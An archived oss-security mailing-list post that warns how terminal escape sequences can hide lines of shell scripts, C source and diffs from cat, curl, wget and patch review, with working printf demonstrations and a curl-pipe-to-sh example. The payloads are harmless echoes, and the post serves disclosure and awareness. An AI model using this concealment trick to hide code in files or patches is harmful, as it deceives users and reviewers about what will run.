Date: Thu, 17 Sep 2015 18:03:19 +0200 From: up201407890@...nos.dcc.fc.up.pt To: oss-security@...ts.openwall.com Subject: s/party/hack like it's 1999 Federico Bento <up201407890@...nos.dcc.fc.up.pt> So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?" http://www.openwall.com/lists/oss-security/2015/08/11/8 This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new. How it technically works: A terminal escape sequence is a special sequence of characters that is printed (like any other text). If the terminal understands the sequence, it won't display the character-sequence, but will perform some action. While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness. $ printf '#!/bin/bash

echo doing something evil!

exit

\033[2Aecho doing something very nice!

' > backdoor.sh $ chmod +x backdoor.sh $ cat backdoor.sh #!/bin/bash echo doing something very nice! $ ./backdoor.sh doing something evil! As you can see, our beloved 'cat' cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action. And this action moves the cursor up X times, overwriting what is above it X lines. But this doesn't affect only 'cat', it affects everything that interprets escape sequences. $ head backdoor.sh #!/bin/bash echo doing something very nice! $ tail backdoor.sh #!/bin/bash echo doing something very nice! $ more backdoor.sh #!/bin/bash echo doing something very nice! It's not over yet! $ curl 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! $ wget -qO - 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! But if we pipe it into a shell... $ curl -s 127.0.0.1/backdoor.sh|sh doing something evil! $ wget -qO - 127.0.0.1/backdoor.sh|sh doing something evil! You might be thinking "If I opened that in my browser, I would detect it being malicious!" Well, think again... One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then. I wouldn't even be surprised if most of those install scripts that make use of these 'pipe into sh' bullcrap abused this. I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files... It's no secret, most of us rely on 'cat' to view files. I guess this is one black kitty, giving you bad luck. Here's another example with a .c file $ printf '#include <stdio.h>



int main()

{

\tprintf("doing something evil\

");

\t/*\033[2A

\t/* This simple program doesnt do much... */

\tprintf("doing something very nice\

");

\treturn 0;

}

' > nice.c $ cat nice.c #include <stdio.h> int main() { /* This simple program doesnt do much... */ printf("doing something very nice

"); return 0; } $ gcc nice.c $ ./a.out doing something evil doing something very nice 'diff' also interprets escape sequences and so do the resulting patches going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us. $ cat backdoor.sh #evil file #!/bin/bash echo doing something very nice! $ cat legit.sh #actually echoes doing something very nice! #!/bin/bash echo doing something very nice! $ diff -Naur backdoor.sh legit.sh --- backdoor.sh 2015-09-17 16:25:42.985349535 +0100 +++ legit.sh 2015-09-17 16:26:14.950158635 +0100 @@ -1,4 +1,2 @@ #!/bin/bash -echo doing something very nice! +echo doing something very nice! $ diff -Naur backdoor.sh legit.sh > file.patch $ patch legit.sh -R file.patch $ chmod +x legit.sh $ ./legit.sh doing something evil! Hint: 'less' doesn't interpret escape sequences unless the -r switch is used, so stop aliasing it to 'less -r' just because there's no colored output. s/party/hack like it's 1999 ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.